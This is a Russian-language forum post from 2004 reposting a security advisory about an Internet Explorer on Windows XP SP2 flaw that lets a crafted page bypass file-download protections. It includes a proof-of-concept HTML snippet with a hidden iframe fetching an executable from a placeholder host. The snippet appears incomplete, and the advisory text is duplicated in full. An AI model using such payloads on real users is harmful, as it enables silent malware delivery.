Geser
24.11.2004, 10:09
Программа: Microsoft Internet Explorer (IE) на Windows XP SP2
Опасность: Средняя
Наличие эксплоита: Да
Описание:
Уязвимость обнаружена в Microsoft Internet Explorer на Windows XP SP2. Удаленный атакующий может загрузить на уязвимую систему произвольный файл.
Удаленный атакующий может с помощью специально сформированной web страницы обойти ограничения безопасности для 'File Download' и 'File Open' и загрузить произвольный файл на уязвимую систему. Уязвимость реализуется посредством ответа сервера на запрос сообщением HTTP 404 error и вызова метода execCommand. Пример:
<html>
< body>
< iframe src='http://your.domain.com/v.exe?.htm' name=
"NotFound" width="0" height="0"></iframe>
Click here (#).
< /body>
< /html>
URL производителя: www. microsoft.com
Решение: решение на данный момент не существует
Опасность: Средняя
Наличие эксплоита: Да
Описание:
Уязвимость обнаружена в Microsoft Internet Explorer на Windows XP SP2. Удаленный атакующий может загрузить на уязвимую систему произвольный файл.
Удаленный атакующий может с помощью специально сформированной web страницы обойти ограничения безопасности для 'File Download' и 'File Open' и загрузить произвольный файл на уязвимую систему. Уязвимость реализуется посредством ответа сервера на запрос сообщением HTTP 404 error и вызова метода execCommand. Пример:
<html>
< body>
< iframe src='http://your.domain.com/v.exe?.htm' name=
"NotFound" width="0" height="0"></iframe>
Click here (#).
< /body>
< /html>
URL производителя: www. microsoft.com
Решение: решение на данный момент не существует